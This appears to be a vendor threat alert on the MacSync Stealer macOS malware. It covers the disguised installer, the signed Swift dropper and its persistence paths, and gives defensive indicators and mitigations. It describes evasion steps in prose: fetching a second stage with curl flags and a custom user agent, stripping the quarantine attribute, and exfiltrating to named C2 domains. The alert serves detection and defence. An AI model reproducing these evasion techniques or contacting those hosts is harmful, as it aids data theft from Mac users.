Back to threat alerts

MacSync Stealer Malware

Jamf Threat Labs has identified a significant evolution in the deployment tactics of the MacSync Stealer malware. Previously reliant on social engineering techniques such as "ClickFix" or "drag-to-terminal" instructions, threat actors have shifted towards a more sophisticated approach. The malware is now being distributed as a code-signed Swift application, significantly increasing its ability to bypass standard macOS security controls.

Threat alert
December 29, 2025

This campaign utilises a deceptive disk image, masquerading as a legitimate installer (zk-call-messenger-installer-3.9.2-lts.dmg), to deliver a dropper that silently retrieves and executes a second-stage payload without requiring direct user interaction with the terminal.

Delivery Mechanism:

The malware is delivered via a disk image (DMG) named zk-call-messenger-installer-3.9.2-lts.dmg. To evade detection and inflate the file size (approx. 25.5MB), the disk image contains decoy PDF files related to LibreOffice.

Code Signing:

The malicious binary was signed and notarised using the Apple Developer Team ID GNJLS3UYZ4, which has since been revoked following reports to Apple.

Execution Flow:

  • Initialisation: Upon execution, the Swift-based dropper (runtimectl) establishes persistence directories at ~/Library/Application Support/UserSyncWorker/ and creates a log file at ~/Library/Logs/UserSyncWorker.log.
  • Environment Checks: It performs checks for internet connectivity and enforces a rate limit, ensuring it does not run more than once every 3600 seconds.
  • Payload Retrieval: If conditions are met, it fetches an obfuscated script from https://gatemaden.space using curl. The threat actors utilise specific flags (-fL, -sS, --noproxy) and a custom user agent (UserSyncWorker/1.0 (macOS)) to evade network-based detection.
  • Evasion & Execution: The dropper removes the com.apple.quarantine attribute from the downloaded payload (/tmp/runner), sets executable permissions, and validates that the file is a zsh script.
  • Final Stage: The script is executed, connecting to the C2 domain focusgroovy.com to exfiltrate data.
Mitigations:

Indicator Sweeping: Scan endpoints for the presence of the following filesystem artefacts:

  • ~/Library/Logs/UserSyncWorker.log
  • ~/Library/Application Support/UserSyncWorker/
  • /tmp/runner (though this is deleted after execution)

Revocation Checks: Ensure macOS devices are online to receive the latest certificate revocation lists (CRLs) from Apple, which will invalidate the compromised Team ID GNJLS3UYZ4.

Recommendations:

Endpoint Detection and Response (EDR): Deploy and configure EDR solutions to monitor for unusual process execution chains, particularly signed applications spawning shells (zsh/bash) or using curl with unusual flags or user agents.

User Awareness Training: Educate users that code signing and notarisation do not guarantee software safety. Users should be wary of applications asking them to override security settings or those downloaded from unofficial sources.

Behavioural Monitoring: Monitor for applications that attempt to modify file attributes or those creating hidden directories in the user's Library folder.